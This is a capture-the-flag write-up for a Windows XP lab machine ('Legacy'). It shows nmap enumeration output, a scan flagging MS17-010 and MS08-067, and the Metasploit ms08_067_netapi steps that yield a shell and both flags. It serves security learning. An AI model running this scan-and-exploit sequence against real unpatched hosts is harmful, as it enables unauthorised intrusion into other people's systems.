Enumeration
Nmap the target machine
nmap -sC -sV 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.18s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
1023/tcp filtered netvenuechat
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a2:78 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2024-04-21T12:06:17+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s
Check that ports 139 and 445 are open. So we can target the smb service.
I tried to enumerate smb users or shares using several tools such as smbclinet, smbmap, and rpcclient.
But I couldn’t get any useful information.
I managed to anonymously login to the service but due to the permissions, I couldn’t enumerate anything.
So, I tried Nmap scripts to find any known vulnerabilities.
nmap --script=smb-vuln* 10.10.10.4 -sC -p 445,139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 04:14 EDT
Nmap scan report for 10.10.10.4
Host is up (0.18s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
Then, yes! I found windows 2000 and XP versions.
Also, it is vulnerable to CVE-2008-4250
I launched metasploit and searched for it.
msfconsole
search MS08-067
use exploit/windows/smb/ms08_067_netapi
I could find the right one.
You just set the rhosts and then run it. Then you get the shell.
users.txt
After getting the shell, I found user john.
The user text is located in the john’s desktop directory.
root.txt
The root text can be found on the Administrator’s desktop.
No need for privilege escalation!
That’s all for this machine.